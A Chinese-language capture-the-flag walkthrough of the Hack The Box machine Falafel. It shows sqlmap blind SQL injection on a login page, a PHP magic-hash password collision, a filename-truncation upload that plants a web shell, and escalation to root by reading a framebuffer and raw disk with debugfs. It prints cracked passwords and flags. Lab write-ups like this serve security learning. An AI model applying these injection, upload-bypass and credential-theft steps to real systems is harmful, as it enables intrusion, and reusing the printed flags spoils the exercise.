信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.73 | TCP:22,80 |
$ nmap -p- 10.10.10.73 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTTP && SQLMAP 登入页面盲注
http://10.10.10.73/
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图](https://img.4awl.net/img/13/98cc3a0d771821045b37b5024760ea.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图")
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图1](https://img.4awl.net/img/ff/6fbaa6bd1abac545d30dcd2b413ac4.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图1")
username=admin' and '1'='1'--+&password=
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图2](https://img.4awl.net/img/c1/faaba56cecd07db317f3b124c22f42.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图2")
username=admin' and '1'='2'--+&password=
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图3](https://img.4awl.net/img/93/3854b17b6d1c2a06d1d8a2a2898cdf.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图3")
为了测试盲注入,我们可以在页面上查找根据我们的输入而变化的输出。我们知道,当用户名不存在时,用户名字段会显示“重试”,而当用户名存在时,用户名字段会显示“错误标识:admin”。如果查看sqlmap的手册页,--string选项显示“-string=STRING当查询被评估为True时匹配的字符串”。还有一个--not-string,表示查询为false。
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图4](https://img.4awl.net/img/7f/69f364a26876000259627d8871ae18.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图4")
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图5](https://img.4awl.net/img/ba/c282f1583005f218f4f2170bd3b27d.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图5")
$ sqlmap -r sql --level 5 --risk 3 --batch --string "Wrong identification"
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图6](https://img.4awl.net/img/b3/38f5bf649397196d465742edad2527.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图6")
$ sqlmap -r sql --level 5 --risk 3 --batch --string "Wrong identification" --dump
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图7](https://img.4awl.net/img/8a/257e22564030dca20d57609b9e29cf.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图7")
username:chris password:juggling
https://github.com/MartinxMax/MCollider
爆破admin用户md5值
$ python3 MCollider.py -md5 0e4620
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图8](https://img.4awl.net/img/ba/6db06b24e0f4744ec72b8adf92c64d.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图8")
[00:57:39][WARNING] -> 240610708 is contained by MD5:0e462097431906509019562988736854
使用密码登录管理员账户
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图9](https://img.4awl.net/img/a3/fe68ff4cebe480566d2aded3b452d4.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图9")
文件截断
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图10](https://img.4awl.net/img/2e/b86906a1fe9ac27cd78b1944812292.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图10")
当我们上传一个png链接时会被保存在目录uploads/0909-0757_e7753937572b0b96中
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图11](https://img.4awl.net/img/5d/579b4c2bc9dd986e349b0f903cdca8.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图11")
http://10.10.16.17/test.php
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图12](https://img.4awl.net/img/26/d5f3f54efb3734b08c3ea8f7ad9f43.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图12")
根据用户的配置文件提示,跟长度有关
$ touch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.png
http://10.10.16.17/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.png
提示总长度为241字节,已超出限制
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图13](https://img.4awl.net/img/a0/8b898764f3bf1e873f7aa7d4e4d40f.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图13")
并且后缀.png丢失
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图14](https://img.4awl.net/img/f2/6bde4425a4c99766bda8c5aec4fa67.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图14")
http://10.10.16.17/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.png
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图15](https://img.4awl.net/img/60/13ced8e3bcc6289dbef64c012b1f6e.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图15")
$ cp p0wny.php AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.png
http://10.10.16.17/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.png
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图16](https://img.4awl.net/img/e6/e7bf158fd9f6f7ca146107a89b157c.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图16")
http://10.10.10.73/uploads/0909-0811_ea7487f48ad80ceb/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图17](https://img.4awl.net/img/92/4e260ea8a9126435964ce72bb59712.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图17")
www-data@falafel:/tmp$ cat /var/www/html/connection.php
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图18](https://img.4awl.net/img/02/693dce85319a28c3c1407b3f3fd79e.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图18")
username:moshe password:falafelIsReallyTasty
www-data@falafel:/tmp$ su moshe
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图19](https://img.4awl.net/img/3a/a6a35b9cbe234302022074b8796312.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图19")
User.txt
2b430278d922c8141b444ce36292e7f2
权限提升
moshe -> yossi
moshe@falafel:/tmp$ w
用户yossi已登入当前主机
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图20](https://img.4awl.net/img/e9/bac2039464f3af1310264f005a50d9.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图20")
/dev/fb0 是一个字符设备文件,代表第一个帧缓冲设备(framebuffer device)。帧缓冲是用于图形显示的一种机制,它允许程序直接操作显示屏的内存区域,从而实现图形输出。
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图21](https://img.4awl.net/img/b4/9b8c0ddda7984f7334f3bc0ec6db9e.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图21")
moshe@falafel:/tmp$ cat /dev/fb0 > /tmp/screenshot.raw
要查看此文件,我们还需要屏幕分辨率,可以在/sys/class/graphics/fb0/中找到:
moshe@falafel:/tmp$ cat /sys/class/graphics/fb0/virtual_size
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图22](https://img.4awl.net/img/ba/05603a1c991ea1f6c5956d74c2df73.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图22")
$ scp [email protected]:/tmp/screenshot.raw /tmp/
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图23](https://img.4awl.net/img/86/50a54e7d02e144567e8fcdf3f27ecc.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图23")
使用GIMP打开raw文件并且设置分辨率1176,885
然后将其导出为png
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图24](https://img.4awl.net/img/c0/bea30153cc6e96f11aac56b86243ff.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图24")
username:yossi password:MoshePlzStopHackingMe!
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图25](https://img.4awl.net/img/c4/0872802f8013d346395eff558947fb.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图25")
SDA
yossi@falafel:/tmp$ df
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图26](https://img.4awl.net/img/d1/fdd724473f248729234a128a970a62.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图26")
查找系统中块设备信息
yossi@falafel:~$ blkid
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图27](https://img.4awl.net/img/1a/0b8a1bbb487befcd7377e1fd61ca55.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图27")
sda1是主磁盘,sda2是交换磁盘
使用debugfs命令以交互方式检查和修改文件系统的内部结构
yossi@falafel:~$ debugfs /dev/sda1
debugfs: cat /root/root.txt
Root持久化
debugfs: cat /root/.ssh/id_rsa
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图28](https://img.4awl.net/img/26/3b638c3779f4a28bc2d96db8f355e7.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图28")
$ chmod 600 ./id_rsa
$ ssh -i /tmp/id_rsa [email protected]
![[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图29](https://img.4awl.net/img/0e/c4644430151d8f5ec4216411cf74e2.jpg "[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MC…插图29")
Root.txt
1f0167a6445788cc5c03f8ac93b82f71
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
